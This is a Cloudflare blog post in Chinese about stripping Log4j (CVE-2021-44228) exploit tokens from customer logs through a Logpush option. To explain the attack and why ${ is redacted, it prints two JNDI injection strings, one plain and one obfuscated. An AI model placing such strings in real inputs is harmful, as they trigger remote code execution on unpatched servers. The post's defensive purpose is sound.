Subscribe to receive notifications of new posts:

清理 Cloudflare 日志以保护客户免受 Log4j 漏洞影响

12/14/2021

3 min read

2021 年 12 月 9 日,CVE-2021-44228这种零日漏洞利用在全球曝光。该漏洞会影响 Apache Log4j 实用工具。Cloudflare 立即更新了我们的 WAF,以帮助防御该漏洞,但我们建议客户尽快更新其系统。

然而,我们了解许多 Cloudflare 客户通过使用 Log4j 的软件使用其日志,因此我们还缓解了通过 Cloudflare 日志的任何漏洞利用。截至本文发稿时,我们在发送给客户的日志中发现高达 1000 次/秒的漏洞利用模式。

客户可以立即开始更新其 Logpush 作业,以自动修改可能触发此漏洞的令牌。您可以在我们的开发人员文档中阅读更多相关信息,或查看下面的详情。

攻击的工作方式

您可以在此处我们的博客帖子中阅读有关 Log4j 漏洞工作方式的更多信息。简而言之,攻击者可以在任何字符串中添加诸如 ${jndi:ldap://example.com/a} 之类的内容。Log4j 会在互联网上建立连接以检索此对象。

Cloudflare 日志包含由公共互联网上的最终用户控制的许多字符串字段,例如用户代理和 URL 路径。通过此漏洞,恶意用户有可能在读取这些字段并使用未修补的 Log4j 实例的任何系统上进行远程代码执行。

我们的缓解方案

遗憾的是,仅仅检查诸如 ${jndi:ldap 之类的令牌不足以防御此漏洞。由于模板中使用强大的语言表达式,还有必要检查混淆的变体。我们已经发现攻击者在使用诸如 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} 之类的真实用例变种。因此,修改令牌 ${ 是防御此漏洞的最常规方法。

令牌 ${ 在我们目前发送给客户的日志中出现的频率高达 1,000 次/秒。对一些记录进行抽查表明,该令牌的许多情况并不是企图利用此漏洞。因此我们无法安全地修改日志,而不影响可能预期在其日志中出现此令牌的客户。

从现在开始,客户可以更新其 Logpush 作业以修改所有地方的字符串 ${ 并将其替换为 x{。

为此,客户可以更新其 Logpush 作业选项配置以包括参数 CVE-2021-44228=true。有关如何使用 Logpush API 执行此操作的详细说明,请参阅我们的开发人员文档中的示例。请注意,此选项目前在 Cloudflare Dashboard 中不可用,仅可使用 API 进行修改。

在 Twitter 上讨论 在 Hacker News 上讨论 在 Reddit 上讨论

日志 漏洞 零日威胁 安全性 Log4J

在 Twitter 上关注 Cloudflare

Jon Levine |@jplevine

Cloudflare 丨Cloudflare

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you're looking for a new career direction, check out our open positions.
Vulnerabilities (CN)简体中文Log4J (CN)Log4Shell (CN)

Follow on X

Jon Levine|@jplevine
Cloudflare|@cloudflare

Related posts

March 14, 2024 12:30 PM

缓解 Cloudflare AI 产品中的令牌长度侧信道攻击

Workers AI 和 AI Gateway 团队最近与本古里安大学的安全研究人员密切合作,通过我们的公共漏洞悬赏计划提交了一份研究报告。通过这个流程,我们发现并完全修补了一个可能会影响所有大型语言模型 (LLM) 提供商的漏洞。以下是完整的内容...